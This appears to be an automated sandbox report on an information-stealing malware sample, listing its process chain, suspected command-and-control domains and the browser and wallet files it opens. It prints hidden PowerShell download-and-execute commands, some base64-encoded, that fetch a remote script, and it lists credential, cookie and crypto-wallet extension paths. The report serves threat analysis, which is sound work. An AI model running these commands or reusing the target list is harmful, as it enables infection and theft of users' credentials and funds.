                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))"
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded Sleep 20;Start-Process "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ArgumentList "-w hidden -ep bypass -nop -Command `"iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))`"" -WindowStyle Hidden
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded Sleep 20;Start-Process "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ArgumentList "-w hidden -ep bypass -nop -Command `"iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))`"" -WindowStyle HiddenJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: powershell.exeString found in binary or memory: cloudewahsj.shop
                          Source: powershell.exeString found in binary or memory: rabidcowse.shop
                          Source: powershell.exeString found in binary or memory: noisycuttej.shop
                          Source: powershell.exeString found in binary or memory: tirepublicerj.shop
                          Source: powershell.exeString found in binary or memory: framekgirus.shop
                          Source: powershell.exeString found in binary or memory: wholersorie.shop
                          Source: powershell.exeString found in binary or memory: abruptyopsn.shop
                          Source: powershell.exeString found in binary or memory: nearycrepso.shop
                          Source: powershell.exeString found in binary or memory: quantitypitt.click
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc uwbsaguazqbwacaamgawadsauwb0ageacgb0ac0auabyag8aywblahmacwagaciaqwa6afwavwbpag4azabvahcacwbcafmaeqbzafcabwb3adyanabcafcaaqbuagqabwb3ahmauabvahcazqbyafmaaablagwababcahyamqauadaaxabwag8adwblahiacwboaguababsac4azqb4aguaigagac0aqqbyagcadqbtaguabgb0aewaaqbzahqaiaaiac0adwagaggaaqbkagqazqbuacaalqblahaaiabiahkacabhahmacwagac0abgbvahaaiaataemabwbtag0ayqbuagqaiabgaciaaqblahgaiaaoacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8aywbhagiazgauagsababpahaazablahmayqbrac4acwboag8acaavahmabqb1agcabablac4aygbkaccakqapagaaigaiacaalqbxagkabgbkag8adwbtahqaeqbsaguaiabiagkazabkaguabga=
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>not found</title> <style> body { font-family: system-ui; font-weight: 300; font-size: 1.25rem; color: #36393a; display: flex; align-items: center; justify-content: center; } main { max-width: 1200px; margin-top: 120px; display: flex; flex-wrap: wrap; align-items: center; justify-content: center; } #text { max-width: 60%; margin-left: 1rem; margin-right: 1rem; } main > section > div { margin-bottom: 3.25rem; } svg { margin-left: 2rem; } @keyframes eye-1 { 0% { transform: translatex(0); } 10%, 50% { transform: translatex(-5px); } 60% { transform: translatex(0); } 100% { transform: translatex(0px); } } @keyframes eye-2 { 0% { transform: translatex(0); } 10%, 50% { transform: translatex(5px); } 60% { transform: translatex(0); } 100% { transform: translatex(0px); } } svg > .eye-1 { animation: eye-1 3s infinite; } svg > .eye-2 { animation: eye-2 3s 0.6s infinite; } h1 { font-size: 3.75rem; font-weight: 400; margin-bottom: 0.5rem; } h3 { font-size: 2rem; font-weight: 400; color: #92979b; margin: 0; } a { color: #0055dc; } p { margin: 0; } #error-title { font-size: 2rem; margin-bottom: 1rem; } #footer-title { font-weight: 700; margin-bottom: 0.75rem; } </style> </head> <body> <main> <section id="text"> <div> <h1>error 404</h1> <h3>object not found</h3> </div> <div> <p> this object does not exist or is not publicly accessible at this url. check the url of the object that you're looking for or contact the owner to enable public access. </p> </div> <div> <p id="footer-title">is this your bucket?</p> <p> learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >public access</a > </p> </div> </section> <section> <svg width="414" height="212" viewbox="0 0 414 212"
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc uwbsaguazqbwacaamgawadsauwb0ageacgb0ac0auabyag8aywblahmacwagaciaqwa6afwavwbpag4azabvahcacwbcafmaeqbzafcabwb3adyanabcafcaaqbuagqabwb3ahmauabvahcazqbyafmaaablagwababcahyamqauadaaxabwag8adwblahiacwboaguababsac4azqb4aguaigagac0aqqbyagcadqbtaguabgb0aewaaqbzahqaiaaiac0adwagaggaaqbkagqazqbuacaalqblahaaiabiahkacabhahmacwagac0abgbvahaaiaataemabwbtag0ayqbuagqaiabgaciaaqblahgaiaaoacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8aywbhagiazgauagsababpahaazablahmayqbrac4acwboag8acaavahmabqb1agcabablac4aygbkaccakqapagaaigaiacaalqbxagkabgbkag8adwbtahqaeqbsaguaiabiagkazabkaguabga=Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>not found</title> <style> body { font-family: system-ui; font-weight: 300; font-size: 1.25rem; color: #36393a; display: flex; align-items: center; justify-content: center; } main { max-width: 1200px; margin-top: 120px; display: flex; flex-wrap: wrap; align-items: center; justify-content: center; } #text { max-width: 60%; margin-left: 1rem; margin-right: 1rem; } main > section > div { margin-bottom: 3.25rem; } svg { margin-left: 2rem; } @keyframes eye-1 { 0% { transform: translatex(0); } 10%, 50% { transform: translatex(-5px); } 60% { transform: translatex(0); } 100% { transform: translatex(0px); } } @keyframes eye-2 { 0% { transform: translatex(0); } 10%, 50% { transform: translatex(5px); } 60% { transform: translatex(0); } 100% { transform: translatex(0px); } } svg > .eye-1 { animation: eye-1 3s infinite; } svg > .eye-2 { animation: eye-2 3s 0.6s infinite; } h1 { font-size: 3.75rem; font-weight: 400; margin-bottom: 0.5rem; } h3 { font-size: 2rem; font-weight: 400; color: #92979b; margin: 0; } a { color: #0055dc; } p { margin: 0; } #error-title { font-size: 2rem; margin-bottom: 1rem; } #footer-title { font-weight: 700; margin-bottom: 0.75rem; } </style> </head> <body> <main> <section id="text"> <div> <h1>error 404</h1> <h3>object not found</h3> </div> <div> <p> this object does not exist or is not publicly accessible at this url. check the url of the object that you're looking for or contact the owner to enable public access. </p> </div> <div> <p id="footer-title">is this your bucket?</p> <p> learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >public access</a > </p> </div> </section> <section> <svg width="414" height="212" viewbox="0 0 414 212" Jump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: 5.2.powershell.exe.c973628.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.powershell.exe.c973628.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000002.2712557949.000000000C911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 5.2.powershell.exe.c973628.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.powershell.exe.c973628.4.raw.unpack, type: UNPACKEDPE
                          Source: powershell.exe, 0000000A.00000002.2756836913.0000000002EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *electrum*
                          Source: powershell.exe, 0000000A.00000002.2754093780.0000000002E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                          Source: powershell.exe, 0000000A.00000002.2754093780.0000000002E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                          Source: powershell.exe, 0000000A.00000002.2754093780.0000000002E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                          Source: powershell.exe, 0000000A.00000002.2754093780.0000000002E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                          Source: powershell.exe, 00000002.00000002.1877446174.00000000073B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
